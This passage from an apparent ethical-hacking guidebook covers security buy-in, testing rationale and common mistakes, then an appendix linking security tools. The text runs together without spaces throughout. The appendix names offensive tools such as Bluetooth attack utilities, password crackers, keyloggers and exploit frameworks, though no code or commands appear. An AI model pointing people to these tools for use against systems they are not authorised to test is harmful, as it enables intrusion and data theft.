Treatawarenessandtrainingprogramsasalong-termbusinessinvestment.Securityawarenessprogramsdon’thavetobeexpensive.Youcanbuyposters,mousepads,screensavers,pens,andstickynotestohelpkeepsecurityoneveryone’smind.SomecreativesolutionsvendorsareGreenidea,Inc.(www.greenidea.com),SecurityAwareness,Inc.(www.securityawareness.com),andmyfavorite(becauseofitsfounder,WinnSchwartau,who’sahilariousguywho’snotafraidtotellitlikeitis)TheSecurityAwarenessCompany(www.thesecurityawarenesscompany.com).

Getthewordonsecurityouttomanagement!Ifyoukeepmembersofmanagementinthedarkonwhatyou’redoing,they’lllikelyneverbeonyourside.Icovergettingsecuritybuy-ininChapter20.Alignyoursecuritymessagewithyouraudienceandkeepitasnontechnicalaspossible.Thelastthingyouwanttodoisunloadabunchofgeek-speakontopeoplewhohavenocluewhatyou’retalkingabout.You’llendupwithoppositethedesiredeffortyou’regoingfor.Putyourmessagesintermsofeachgroupyou’respeakingto:howsecurityimpactsthemandhowtheycanhelp.Leadbyexample.Showthatyoutakesecurityseriouslyandofferevidencethathelpsprovethateveryoneelseshould,too.

Ifyoucangettheearofmanagementandusersandputforthenoughefforttomakesecurityaprioritydayafterday,youcanhelpshapeyourorganization’sculture.Ittakesworkbutitcanprovidesecurityvaluebeyondyourwildestimagination.I’veseenthedifferenceitmakes!

http://www.greenidea.com

http://www.securityawareness.com

http://www.thesecurityawarenesscompany.com

KeepingUpwithOtherSecurityEffortsEthicalhackingviaongoingsecurityassessmentisnotthebe-allandend-allsolutiontoinformationsecurity.Itwillnotguaranteesecurity,butit’scertainlyagreatstart.Thistestingmustbeintegratedaspartofanoverallinformationsecurityprogramthatincludes

Higher-levelinformationriskassessmentsStrongsecuritypoliciesandstandardsthatareenforcedandproperlyadheredtoSolidincidentresponseandbusinesscontinuityplansEffectivesecurityawarenessandtraininginitiatives

Theseeffortsmightrequirehiringmorestafforoutsourcingmoresecurityhelpaswell.

Don’tforgetaboutformaltrainingforyourselfandanycolleagueswhoarehelpingyou.Youhavetoeducateyourselfconsistentlytostayontopofthesecuritygame.Therearegreatconferences,seminars,andonlineresourcesforthisthatIoutlineintheAppendix.

PartVII

ThePartofTens

Visitwww.dummies.com/extras/hackingforgreatDummiescontentonline.


Inthispart…Well,here’stheendoftheroad,sotospeak.Inthispart,I’vecompiledtop-tenlistsofwhatIbelievearetheabsolutecriticalsuccessfactorstomakeyoursecuritytesting—andinformationsecurityingeneral—workinyourorganization.Bookmark,dog-ear,ordowhateveryouneedtodowiththesepagessoyoucanrefertotheminthefuture.Thisisthemeatofwhatyouneedtoknowaboutinformationsecurity,compliance,andmanaginginformationrisks—evenmoresothanthetechnicaltestsandcountermeasuresI’vecoveredthusfar.Readit,studyit,andmakeithappen.Youcandoit!

Inaddition,theAppendixcontainsalistingofmyfavoritesecuritytestingtoolsandresourcesthatI’vecovered(andmore),brokendownintovariouscategoriesforeasyreference.

Chapter20

TenTipsforGettingSecurityBuy-InDozensofkeystepsexistforobtainingthebuy-inandsponsorshipthatyouneedtosupportyoursecuritytestingefforts.Inthischapter,IdescribethetoptenIfindtobethemosteffective.

CultivateanAllyandaSponsorAlthoughrecentbreachesandcompliancepressuresarehelpingpushthingsalong,sellingsecuritytomanagementisn’tsomethingyouwanttotacklealone.Getanally—preferablyyourdirectmanagerorsomeoneatthatlevelorhigherintheorganization.Choosesomeonewhounderstandsthevalueofsecuritytestingaswellasinformationsecurityingeneral.Althoughthispersonmightnotbeabletospeakforyoudirectly,heorshecanbeseenasanunbiasedsponsorandcangiveyoumorecredibility.

Don’tBeaFUDdyDuddySherlockHolmessaid,“Itisacapitalmistaketotheorizebeforeonehasdata.”Tomakeagoodcaseforinformationsecurityandtheneedforvulnerabilitytesting,supportyourcasewithrelevantdata.However,don’tblowstuffoutofproportionforthesakeofstirringupfear,uncertainty,anddoubt(FUD).Managersworththeirsaltcanseerightthroughthat.Focusoneducatingmanagementwithpracticaladvice.Rationalfearsproportionaltothethreatarefine.Justdon’ttaketheChickenLittleroute,claimingthattheskyisfallingwitheverythingallthetime.That’stiringtothoseoutsideofITandsecurityandwillonlyhurtyouoverthelonghaul.

DemonstrateHowtheOrganizationCan’tAffordtoBeHacked

Showhowdependenttheorganizationisonitsinformationsystems.Createwhat-ifscenarios—sortofabusinessimpactassessment—toshowwhatcanhappen,howtheorganization’sreputationcanbedamaged,andhowlongtheorganizationcangowithoutusingthenetwork,computers,anddata.Askupper-levelmanagerswhattheywoulddowithouttheircomputersystemsandITpersonnel—orwhatthey’ddoifsensitivebusinessorclientinformationwascompromised.Showreal-worldanecdotalevidenceofbreaches,includingmalware,physicalsecurity,andsocialengineeringissues,butbepositiveaboutit.Don’tapproachmanagementnegativelywithFUD.Rather,keeptheminformedonserioussecurityhappenings.Oddsarethey’realreadyreadingaboutthesethingsinmajorbusinessmagazinesandnewspapers.Figureoutwhatyoucandotoapplythosestoriestoyoursituation.Tohelpmanagementrelate,findstoriesregardingsimilarbusinesses,competitors,orindustries.(AgoodresourceisthePrivacyRightsClearinghouseChronologyofDataBreachesatwww.privacyrights.org/data-breach.)TheannualVerizonDataBreachInvestigationsReport(www.verizonenterprise.com/DBIR),amongothers,isalsoagreatresource.Letthefactsspeakforthemselves.

GoogleandBingaregreattoolstofindpracticallyeverythingyouneedregardinginformationsecuritybreaches.

Showmanagementthattheorganizationdoeshavewhatahackerwants.Acommonmisconceptionamongthoseignorantaboutinformationsecuritythreatsandvulnerabilitiesisthattheirorganizationornetworkisnotreallyatrisk.Besuretopointoutthepotentialcostsfromdamagecausedbyhacking,suchas:

MissedopportunitycostsExposureofintellectualpropertyLiabilityissuesLegalcostsandjudgmentsCompliance-relatedfinesCriminalpunishmentsLostproductivityClean-uptimeandincidentresponsecostsReplacementcostsforlost,exposed,ordamagedinformationorsystemsCostsoffixingatarnishedreputation(itcantakealifetimetobuildareputationandmereminutesforittogoaway)

http://www.privacyrights.org/data-breach


OutlinetheGeneralBenefitsofSecurityTesting

Inadditiontothepotentialcostslistedintheprecedingsection,talkabouthowproactivetestingcanhelpfindsecurityvulnerabilitiesininformationsystemsthatnormallymightbeoverlooked.Tellmanagementthatsecuritytestinginthecontextofethicalhackingisawayofthinkinglikethebadguyssothatyoucanprotectyourselffromthem—the“knowyourenemy”mindsetfromSunTzu’sTheArtofWar.

ShowHowSecurityTestingSpecificallyHelpstheOrganization

Documentbenefitsthatsupporttheoverallbusinessgoals:

Demonstratehowsecuritydoesn’thavetobeultra-expensiveandcansavetheorganizationmoneyinthelongrun.

Securityismucheasierandcheapertobuild-inupfrontthantoadd-onlater.Securitydoesn’thavetobeinconvenientorhinderproductivityifit’sdoneproperly.

Discusshownewproductsorservicescanbeofferedforacompetitiveadvantageifsecureinformationsystemsareinplace.

Stateandfederalprivacyandsecurityregulationsaremet.Businesspartnerandcustomerrequirementsaresatisfied.Managersandthecompanycomeacrossasbusiness-worthyintheeyesofcustomersandbusinesspartners.Asolidsecuritytestingprogramandtheappropriateremediationprocessshowthattheorganizationisprotectingsensitivecustomerandbusinessinformation.

Outlinethecomplianceandauditbenefitsofin-depthsecuritytesting.

GetInvolvedintheBusinessUnderstandthebusiness—howitoperates,whothekeyplayersare,andwhatpoliticsareinvolved:

Gotomeetingstoseeandbeseen.Thiscanhelpprovethatyou’reconcernedaboutthebusiness.Beapersonofvaluewho’sinterestedincontributingtothebusiness.Knowyouropposition.Again,usethe“knowyourenemy”mentality—ifyouunderstandthepeopleyou’redealingwithinternally,alongwiththeirpotentialobjections,buy-inismucheasiertoget.Thisgoesnotonlyformanagementbutalsoyourpeersandpracticallyeveryuseronthenetwork.

EstablishYourCredibilityIthinkoneofthebiggestimpedimentsholdingITandsecurityprofessionalsbackispeoplenot“getting”us.Yourcredibilityisallyou’vegot.Focusonthesefourcharacteristicstobuilditandmaintainit:

Bepositiveabouttheorganizationandprovethatyoureallymeanbusiness.Yourattitudeiscritical.Empathizewithmanagersandshowthemthatyouunderstandthebusinesssideandwhatthey’reupagainst.Determinewaysthatyoucanhelpothersgetwhattheyneed.Tocreateanypositivebusinessrelationship,youmustbetrustworthy.Buildthattrustovertime,andsellingsecuritywillbemucheasier.

SpeakonManagement’sLevelAscoolasitsounds,nooneoutsideofITandsecurityisreallythatimpressedwithtechietalk.Oneofthebestwaystolimitorreduceyourcredibilityistocommunicatewitheveryoneinthisfashion.Talkintermsofthebusiness.Talkintermsofwhatyourspecificaudienceneedstohear.Otherwise,oddsaregreatthatit’llgorightovertheirheads.

I’veseencountlessITandsecurityprofessionalsloseupper-levelmanagersassoonastheystartspeaking.Amegabytehere;statefulinspectionthere;packets,packetseverywhere!Badidea.Relatesecurityissuestoeverydaybusinessprocesses,jobfunctions,andoverallgoals.Period.

ShowValueinYourEffortsHere’swheretherubbermeetstheroad.Ifyoucandemonstratethatwhatyou’redoingoffersbusinessvalueonanongoingbasis,youcanmaintainagoodpaceandnothavetoconstantlypleadtokeepyoursecuritytestingprogramgoing.Keepthesepointsinmind:

DocumentyourinvolvementinITandinformationsecurity,andcreateongoingreportsformanagementregardingthestateofsecurityintheorganization.Givemanagementexamplesofhowtheorganization’ssystemsare,orwillbe,securedfromattacks.Outlinetangibleresultsasaproofofconcept.Showsamplevulnerabilityassessmentreportsyou’verunonyoursystemsorfromthesecuritytoolvendors.Treatdoubts,concerns,andobjectionsbymanagementandusersasrequestsformoreinformation.Findtheanswersandgobackarmedandreadytoproveyourownworthiness.

BeFlexibleandAdaptablePrepareyourselfforskepticismandrejection.Evenashotassecurityistoday,itstillhappens,especiallywithupper-levelmanagerssuchasCFOsandCEOs,whoareoftendisconnectedfromITandsecurityintheorganization.Amiddle-managementstructurethatlivestocreatecomplexityisapartytotheproblemaswell.

Don’tgetdefensive.Securityisalong-termprocess,notashort-termproductorsingleassessment.Startsmall—usealimitedamountofresources,suchasbudget,tools,andtime,andthenbuildtheprogramovertime.

Studieshavefoundthatnewideaspresentedcasuallyandwithoutpressureareconsideredandhaveahigherrateofacceptancethanideasthatareforcedonpeopleunderadeadline.Justaswithaspouseorcolleaguesatwork,ifyoufocusonandfine-tuneyourapproach—atleastasmuchasyoufocusonthecontentofwhatyou’regoingtosay—youcanoftengetpeopleonyourside,andinreturn,getalotmoreaccomplishedwithyoursecurityprogram.

Chapter21

TenReasonsHackingIstheOnlyEffectiveWaytoTest

Approachingyoursecuritytestingfromtheperspectiveofethicalhackingisnotjustforfunorshow.Fornumerousbusinessreasons,it’stheonlyeffectivewaytofindthesecurityvulnerabilitiesthatmatterinyourorganization.

TheBadGuysThinkBadThoughts,UseGoodTools,andDevelopNewMethods

Ifyou’regoingtokeepupwithexternalattackersandmaliciousinsiders,youhavetostaycurrentonthelatestattackmethodsandtoolsthatthey’reusing.Icoversomeofthelatesttricks,techniques,andtoolsthroughoutthisbook.

ITGovernanceandComplianceAreMorethanHigh-LevelChecklistAudits

Withallthegovernmentandindustryregulationsinplace,yourbusinesslikelydoesn’thaveachoiceinthematter.Youhavetoaddresssecurity.Theproblemisthatbeingcompliantwiththeselawsandregulationsdoesn’tautomaticallymeanyournetworkandinformationaresecure.ThePaymentCardIndustryDataSecurityStandard(PCIDSS)comestomindhere.Therearecountlessbusinessesrunningtheirvulnerabilityscansandansweringtheirself-assessmentquestionnairesassumingthatthat’sallthat’sneededtomanagetheirinformationsecurityprograms.Youhavetotakeoffthechecklistauditblindersandmovefromacompliance-centricapproachtoathreat-centricapproach.Usingthetoolsandtechniquescoveredinthisbookenablesyoutodigdeeperintoyourbusiness’struevulnerabilities.

HackingComplementsAuditsandSecurityEvaluations

Nodoubt,someoneinyourorganizationunderstandshigher-levelsecurityauditsbetterthanthisethicalhackingstuff.However,ifyoucansellthatpersononmorein-depthsecuritytestingandintegrateitintoexistingsecurityinitiatives(suchasinternalauditsandcompliancespotchecks),theauditingprocesscangomuchdeeperandimproveyouroutcomes.Everyonewins.

CustomersandPartnersWillAsk,‘HowSecureAreYourSystems?’

Manybusinessesnowrequirein-depthsecurityassessmentsoftheirbusinesspartners.Thesamegoesforcertaincustomers.Thebiggercompaniesalmostalwayswanttoknowhowsecuretheirinformationiswhilebeingprocessedorstoredinyourenvironment.Youcannotrelyondatacenterauditreportssuchasthecommonly-referencedSSAE16ServiceOrganizationalControls(SOC)2standardfordatacentersecurityaudits.TheonlywaytodefinitivelyknowwherethingsstandistousethemethodsandtoolsIcoverinthisbook.

TheLawofAveragesWorksAgainstBusinesses

Informationsystemsarebecomingmorecomplexbytheday.Literally.Withthecloud,virtualization,andmobilebeingfrontandcenterinmostenterprises,it’sgettingmoreandmoredifficultforITandsecuritymanagerstokeepup.It’sjustamatteroftimebeforethesecomplexitiesworkagainstyouandinthebadguys’favor.Acriminalhackerneedstofindonlyonecriticalflawtobesuccessful.Youhavetofindthemall.Ifyou’regoingtostayinformedandensurethatyourcriticalbusinesssystemsandthesensitiveinformationtheyprocessandstorestaysecure,youhavetolookatthingswithamaliciousmindsetanddosoperiodicallyandconsistentlyovertime,notjustonceeverynowandthen.

SecurityAssessmentsImprovetheUnderstandingofBusinessThreats

Youcansaypasswordsareweakorpatchesaremissing,butactuallyexploitingsuchflawsandshowingtheoutcomearequitedifferentmatters.There’snobetterwaytoprovethere’saproblemandmotivatemanagementtodosomethingaboutitthanbyshowingtheoutcomesofthetestingmethodsthatIoutlineinthisbook.

IfaBreachOccurs,YouHaveSomethingtoFallBackOn

Intheeventamaliciousinsiderorexternalattackerstillbreachesyoursecurity,yourbusinessissued,oryourbusinessfallsoutofcompliancewithlawsorregulations,themanagementteamcanatleastdemonstratethatitwasperformingitsduecaretouncoversecurityrisksthroughthepropertesting.Arelatedareathatcanbeproblematicisknowingaboutaproblemandnotfixingit.Thelastthingyouneedisalawyerandhisexpertwitnesspointingouthowyourbusinesswaslaxintheareaofinformationsecuritytestingorfollow-through.That’saroadyoudon’twanttogodown.

In-DepthTestingBringsOuttheWorstinYourSystems

Someonewalkingarounddoingaself-assessmentorhigh-levelauditcanfindsecurity“bestpractices”you’remissing,butheisn’tgoingtofindmostofthesecurityflawsthatin-depthsecurityvulnerabilityandpenetrationtestingisgoingtouncover.ThetestingmethodsIoutlineinthisbookwillbringoutthewartsandall.

CombiningtheBestofPenetrationTestingandVulnerabilityAssessmentsIsWhatYouNeed

Penetrationtestingisrarelyenoughtofindeverythinginyoursystemsbecausethescopeoftraditionalpenetrationtestingissimplytoolimited.Thesamegoesforvulnerabilityassessments,especiallythosethatmostlyinvolvebasicvulnerabilityscans.Whenyoucombineboth,yougetthemostbangforyourbuck.

ProperTestingCanUncoverWeaknessesThatMightGoOverlookedforYears

Performingthepropersecurityassessmentsnotonlyuncoverstechnical,physical,andhumanweaknesses,buttheycanalsorevealproblemswithITandsecurityoperations,suchaspatchmanagement,changemanagement,andlackofuserawareness,whichmaynotbefoundotherwiseoruntilit’stoolate.

Chapter22

TenDeadlyMistakesMakingthewrongchoicesinyoursecuritytestingcanwreakhavoconyourwork,possiblyevenyourcareer.Inthischapter,Idiscusstenpotentialpitfallstobekeenlyawareofwhenperformingyoursecurityassessmentwork.

NotGettingPriorApprovalGettingdocumentedapprovalinadvance,suchasane-mail,aninternalmemo,oraformalcontractforyourethicalhackingefforts—whetherit’sfrommanagementorfromyourclient—isanabsolutemust.It’syour“GetOutofJailFree”card.

Allownoexceptionshere—especiallywhenyou’redoingworkforclients:Makesureyougetasignedcopyofthisdocumentforyourfilestomakesureyou’reprotected.

AssumingYouCanFindAllVulnerabilitiesDuringYourTests

Somanysecurityvulnerabilitiesexist—knownandunknown—thatyouwon’tfindthemallduringyourtesting.Don’tmakeanyguaranteesthatyou’llfindallthesecurityvulnerabilitiesinasystem.You’llbestartingsomethingthatyoucan’tfinish.

Sticktothefollowingtenets:

Berealistic.Usegoodtools.Gettoknowyoursystemsandpracticehoningyourtechniques.

IcovereachoftheseinvariousdepthsinChapters5through16.

AssumingYouCanEliminateAllSecurityVulnerabilities

Whenitcomestonetworks,computers,andapplications,100percent,ironcladsecurityisnotattainable.Youcan’tpossiblypreventallsecurityvulnerabilities,butyou’lldofineifyouuncoverthelow-hangingfruitthatcreatesmostoftheriskandaccomplishthesetasks:

Followsolidpractices—thesecurityessentialsthathavebeenaroundfordecades.Patchandhardenyoursystems.Applyreasonablesecuritycountermeasureswhereyoucanbasedonyourbudgetandyourbusinessneeds.

Manychapters,suchastheoperatingsystemchaptersinPartIV,covertheseareas.It’salsoimportanttorememberthatyou’llhaveunplannedcosts.Youmayfindlotsofsecurityproblemsandwillneedthebudgettoplugtheholes.Perhapsyounowhaveaduecareproblemonyourhandsandhavetofixtheissuesuncovered.Thisiswhyyouneedtoapproachinformationsecurityfromariskperspectiveandhavealltherightpeopleonboard.

PerformingTestsOnlyOnceSecurityassessmentsareameresnapshotofyouroverallstateofsecurity.Newthreatsandvulnerabilitiessurfacecontinually,soyoumustperformthesetestsperiodicallyandconsistentlytomakesureyoukeepupwiththelatestsecuritydefensesforyoursystems.Developbothshort-andlong-termplansforcarryingoutyoursecuritytestsoverthenextfewmonthsandnextfewyears.

ThinkingYouKnowItAllEventhoughsomeinthefieldofITwouldbegtodiffer,nooneworkinginITorinformationsecurityknowseverythingaboutthissubject.Keepingupwithallthesoftwareversions,hardwaremodels,andemergingtechnologies,nottomentiontheassociatedsecuritythreatsandvulnerabilities,isimpossible.TrueITandinformationsecurityprofessionalsknowtheirlimitations—thatis,theyknowwhattheydon’tknow.However,theydoknowwheretogetanswersthroughthemyriadofonlineresourcessuchasfromthoseI’velistedintheAppendix.

RunningYourTestsWithoutLookingatThingsfromaHacker’sViewpoint

Thinkabouthowamaliciousoutsiderorrogueinsidercanattackyournetworkandcomputers.Getafreshperspectiveandtrytothinkoutsidetheproverbialboxabouthowsystemscanbetakenoffline,informationcanbestolen,andsoforth.

Studycriminalandhackerbehaviorsandcommonhackattackssoyouknowwhattotestfor.I’mcontinuallybloggingaboutthissubjectathttp://securityonwheels.com/blog.CheckouttheAppendixforothertrustedresourcesthatcanhelpyouinthisarea.

http://securityonwheels.com/blog/

NotTestingtheRightSystemsFocusonthesystemsandinformationthatmattermost.YoucanhackawayalldayatastandalonedesktoprunningWindowsXPoratatrainingroomprinterwithnothingofvalue,butdoesthatdoanygood?Probablynot.Butyouneverknow.Yourbiggestrisksmightbeontheseeminglyleastcriticalsystem.Focusonwhat’surgentandimportant.

NotUsingtheRightToolsWithouttherighttoolsforthetask,gettinganythingdonewithoutdrivingyourselfnutsisimpossible.It’snodifferentthanworkingaroundthehouse,onyourcar,orinyourgarden.Goodtoolsareanabsolutemust.Downloadthefreeandtrial-versiontoolsImentionthroughoutthisbookandintheAppendix.Buycommercialtoolswhenyoucan—they’reusuallywortheverypenny.Noonesecuritytooldoesitall,though.

Buildingyourtoolboxandgettingtoknowyourtoolswellwillsaveyougobsofeffort,you’llimpressotherswithyourresults,andyou’llhelpminimizeyourbusiness’srisks.

PoundingProductionSystemsattheWrongTime

Oneofthebestwaystotickoffyourmanagerorloseyourclient’strustistorunsecuritytestsagainstproductionsystemswheneveryoneisusingthem.Thisisespeciallytrueforthoserunningolder,morefeebleoperatingsystemsandapplications.Ifyoutrytotestsystemsatthewrongtime,expectthatthecriticalonesmaybenegativelyimpactedattheabsoluteworstmoment.Makesureyouknowthebesttimetoperformyourtesting.Itmightbeinthemiddleofthenight.(Ineversaidinformationsecuritytestingwaseasy!)Thismightbereasontojustifyusingsecuritytoolsandothersupportingutilitiesthatcanhelpautomatecertaintasks,suchasvulnerabilityscannersthatallowyoutorunscansatacertaintime.

OutsourcingTestingandNotStayingInvolved

Outsourcingisgreat,butyoumuststayinvolvedthroughouttheentireprocess.Don’thandoverthereinsofyoursecuritytestingtoathird-partyconsultantoramanagedserviceproviderwithoutfollowingupandstayingontopofwhat’stakingplace.Youwon’tbedoingyourmanagerorclientsanyfavorsbystayingoutofthethird-partyvendors’hair.Getintheirhair,unlessofcourse,it’sabaldpersonlikeme.ButyouknowwhatImean.Youcannotoutsourceaccountability,sostayintouch!

Appendix

ToolsandResourcesTostayup-to-datewiththelatestandgreatestsecuritytestingtoolsandresources,youneedtoknowwheretoturn.Thisappendixcontainsmyfavoritesecuritysites,tools,resources,andmorethatyoucanbenefitfrominyourongoingsecurityassessmentprogram.

Thisbook’sonlineCheatSheetcontainslinkstoalltheonlinetoolsandresourceslistedinthisappendix.Checkitoutatwww.dummies.com/cheatsheet/hacking.


AdvancedMalwareBit9+CarbonBlackSecurityPlatform—www.bit9.com/solutions

DamballaFailsafe—www.damballa.com/solutions/damballa_failsafe.php

https://www.bit9.com/solutions

https://www.damballa.com/solutions/damballa_failsafe.php

BluetoothBlooover—http://trifinite.org/trifinite_stuff_blooover.html

BlueScanner—http://sourceforge.net/projects/bluescanner

Bluesnarfer—www.alighieri.org/tools/bluesnarfer.tar.gz

BlueSniperrifle—www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

BTScannerforXP—www.pentest.co.uk/src/btscanner_1_0_0.zip

CarWhisperer—http://trifinite.org/trifinite_stuff_carwhisperer.html

Smurf—www.gatefold.co.uk/smurf

http://trifinite.org/trifinite_stuff_blooover.html

http://sourceforge.net/projects/bluescanner/

http://www.alighieri.org/tools/bluesnarfer.tar.gz

http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

http://www.pentest.co.uk/src/btscanner_1_0_0.zip

http://trifinite.org/trifinite_stuff_carwhisperer.html

http://www.gatefold.co.uk/smurf/

CertificationsCertifiedEthicalHacker—www.eccouncil.org/CEH.htm

CertifiedInformationSecurityManager—www.isaca.org/Certification/CISM-Certified-Information-Security-Manager/Pages/default.aspx

CertifiedInformationSystemsSecurityProfessional—www.isc2.org/cissp/default.aspx

CertifiedWirelessSecurityProfessional—www.cwnp.com/certifications/cwsp

CompTIASecurity+—http://certification.comptia.org/getCertified/certifications/security.aspx

SANSGIAC—www.giac.org

http://www.eccouncil.org/CEH.htm

http://www.isaca.org/Certification/CISM-Certified-Information-Security-Manager/Pages/default.aspx/

https://www.isc2.org/cissp/default.aspx

https://www.cwnp.com/certifications/cwsp/

http://certification.comptia.org/getCertified/certifications/security.aspx

http://www.giac.org/

DatabasesAdvancedOfficePasswordRecovery—www.elcomsoft.com/aopr.html

AdvancedSQLPasswordRecovery—www.elcomsoft.com/asqlpr.html

AppDetectivePro—www.trustwave.com/Products/Database-Security/AppDetectivePRO

ElcomSoftDistributedPasswordRecovery—www.elcomsoft.com/edpr.html

Idera—www.idera.com

MicrosoftSQLServer2008ManagementStudioExpress—www.microsoft.com/en-us/download/details.aspx?id=7593

Nexpose—www.rapid7.com/vulnerability-scanner.jsp

PeteFinnigan’slistingofOraclescanningtools—www.petefinnigan.com/tools.htm

QualysGuard—www.qualys.com

SQLPing3—www.sqlsecurity.com/downloads

http://www.elcomsoft.com/aopr.html

https://www.elcomsoft.com/asqlpr.html

https://www.trustwave.com/Products/Database-Security/AppDetectivePRO/

https://www.elcomsoft.com/edpr.html

https://www.idera.com/

http://www.microsoft.com/en-us/download/details.aspx?id=7593

https://www.rapid7.com/vulnerability-scanner.jsp

http://www.petefinnigan.com/tools.htm

https://www.qualys.com/

http://www.sqlsecurity.com/downloads/

DenialofServiceProtectionCloudFlare—www.cloudflare.com

DOSarrest—www.dosarrest.com

Incapsula—www.incapsula.com

http://www.cloudflare.com

http://www.dosarrest.com

http://www.incapsula.com

ExploitsMetasploit—www.metasploit.com

OffensiveSecurity’sExploitDatabase—www.exploit-db.com

PwnieExpress—https://pwnieexpress.com


https://www.exploit-db.com/

https://pwnieexpress.com/

GeneralResearchToolsAFRINIC—www.afrinic.net

APNIC—www.apnic.net

ARIN—http://whois.arin.net/ui

Bing—www.bing.com

DNSstuff—www.dnsstuff.com

DNSTools—www.dnstools.com

TheFileExtensionSource—http://filext.com

Google—www.google.com

Googleadvancedoperators—www.googleguide.com/advanced_operators.html

Governmentdomains—www.dotgov.gov/portal/web/dotgov/whois

Hoover’sbusinessinformation—www.hoovers.com

LACNIC—www.lacnic.net

Netcraft’sWhat’sthatsiterunning?—http://netcraft.com

RIPENetworkCoordinationCentre—https://apps.db.ripe.net/search/query.html

Switchboard.com—www.switchboard.com

theHarvester—https://code.google.com/p/theharvester

UnitedStatesPatentandTrademarkOffice—www.uspto.gov

USSearch.com—www.ussearch.com

UnitedStatesSecuritiesandExchangeCommission—www.sec.gov/edgar.shtml

Whois—www.whois.net

WhatIsMyIP—www.whatismyip.com

Yahoo!Finance—http://finance.yahoo.com

Zabasearch—www.zabasearch.com

http://www.afrinic.net/

https://www.apnic.net/

http://whois.arin.net/ui

http://www.bing.com/


http://www.dnstools.com/

http://filext.com/

http://www.google.com/

http://www.googleguide.com/advanced_operators.html

https://www.dotgov.gov/portal/web/dotgov/whois

http://www.hoovers.com/

http://www.lacnic.net/

http://www.netcraft.com/

https://apps.db.ripe.net/search/query.html

http://www.switchboard.com/

https://code.google.com/p/theharvester/

http://www.uspto.gov/

http://www.ussearch.com/

http://www.sec.gov/edgar.shtml

https://www.whois.net/

https://www.whatismyip.com/

http://finance.yahoo.com/

http://www.zabasearch.com/

HackerStuff2600TheHackerQuarterly—www.2600.com

HackerT-shirts,equipment,andothertrinkets—www.thinkgeek.com

Hakin9—http://hakin9.org

(IN)SECUREMagazine—www.net-security.org/insecuremag.php

Phrack—www.phrack.org

TheJargonFile—www.jargon.8hz.com

http://www.2600.com/

http://www.thinkgeek.com/

http://hakin9.org/

http://www.net-security.org/insecuremag.php

http://www.phrack.org/

http://www.jargon.8hz.com/

KeyloggersKeyGhost—www.keyghost.com

SpectorSoft—www.spectorsoft.com


http://www.spectorsoft.com/

LawsandRegulationsComputerFraudandAbuseAct—www.fas.org/sgp/crs/misc/RS20830.pdf

DigitalMillenniumCopyrightAct(DMCA)—www.eff.org/issues/dmca

Gramm-Leach-BlileyAct(GLBA)SafeguardsRule—www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act

HealthInsurancePortabilityandAccountabilityAct(HIPAA)SecurityRule—www.hhs.gov/ocr/privacy/hipaa/understanding/srsummary.html

PaymentCardIndustryDataSecurityStandard(PCIDSS)—www.pcisecuritystandards.org/security_standards/index.php

UnitedStatesSecurityBreachNotificationLaws—www.ncsl.org/research/telecommunications-and-information-

technology/security-breach-notification-laws.aspx

http://www.fas.org/sgp/crs/misc/RS20830.pdf

http://www.eff.org/issues/dmca

http://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act

http://www.hhs.gov/ocr/privacy/hipaa/understanding/srsummary.html

https://www.pcisecuritystandards.org/security_standards/index.php

http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx

LinuxBackTrackLinux—www.backtrack-linux.org

GFILanGuard—www.gfi.com/network-security-vulnerability-scanner

KaliLinux—www.kali.org

LinuxSecurityAuditingTool(LSAT)—http://usat.sourceforge.net

Nexpose—www.rapid7.com/vulnerability-scanner.jsp


THC-Amap—www.thc.org/thc-amap

Tiger—www.nongnu.org/tiger

VarioustoolsatSourceForge—http://sourceforge.net

http://www.backtrack-linux.org/

http://www.gfi.com/network-security-vulnerability-scanner/

https://www.kali.org/

http://usat.sourceforge.net/

https://www.rapid7.com/vulnerability-scanner.jsp


https://www.thc.org/thc-amap/

http://www.nongnu.org/tiger/

http://sourceforge.net/

LiveToolkitsComprehensivelistingoflivebootableLinuxtoolkits—www.livecdlist.com

KaliLinux—www.kali.org

Knoppix—http://knoppix.net

NetworkSecurityToolkit—www.networksecuritytoolkit.org

SecurityToolsDistribution—http://s-t-d.org

http://www.livecdlist.com/

https://www.kali.org/

http://knoppix.net/

http://www.networksecuritytoolkit.org/

http://s-t-d.org/

LogAnalysisArcSightLogger—www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/index.html

GFIEventsManager—www.gfi.com/eventsmanager

http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/index.html

http://www.gfi.com/eventsmanager/

MessagingBrutus—www.hoobie.net/brutus

Cain&Abel—www.oxid.it/cain.html

DNSstuffrelaychecker—www.dnsstuff.com

EICARAnti-Virustestfile—www.eicar.org/anti_virus_test_file.htm

GFIe-mailsecuritytest—www.gfi.com/pages/email-security.asp

mailsnarf—www.monkey.org/~dugsong/dsniff

theHarvester—https://github.com/laramies/theHarvester

smtpscan—www.freshports.org/security/smtpscan




http://www.eicar.org/anti_virus_test_file.htm

http://www.gfi.com/pages/email-security.asp


https://github.com/laramies/theHarvester

http://www.freshports.org/security/smtpscan/

Miscellaneous3MPrivacyFilters—www.shop3m.com/3m-privacy-filters.html

7-Zip—www.7-zip.org

SmartDraw—www.smartdraw.com

Visio—http://visio.microsoft.com/en-us/preview/default.aspx

WinZip—www.winzip.com

http://www.shop3m.com/3m-privacy-filters.html

http://www.7-zip.org/

http://www.smartdraw.com

http://visio.microsoft.com/en-us/preview/default.aspx

http://www.winzip.com/

MobileBitLockerwhitepapers—www.principlelogic.com/bitlocker.html

CheckmarxCxDeveloper—www.checkmarx.com

ElcomSoftForensicDiskDecryptor—www.elcomsoft.com/efdd.html

ElcomSoft’sPhoneBreaker—www.elcomsoft.com/eppb.html

ElcomSoftSystemRecovery—www.elcomsoft.com/esr.html

iOSForensicToolkit—www.elcomsoft.com/eift.html

Ophcrack—http://ophcrack.sourceforge.net

OxygenForensicSuite—www.oxygen-forensic.com

PasswareKitForensic—www.lostpassword.com/kit-forensic.htm

Veracode—www.veracode.com

MicrosoftBitLockerAdministrationandMonitoring—https://technet.microsoft.com/en-us/windows/hh826072.aspx


https://www.checkmarx.com/

https://www.elcomsoft.com/efdd.html

https://www.elcomsoft.com/eppb.html

https://www.elcomsoft.com/esr.html

https://www.elcomsoft.com/eift.html


http://www.oxygen-forensic.com/


http://www.veracode.com

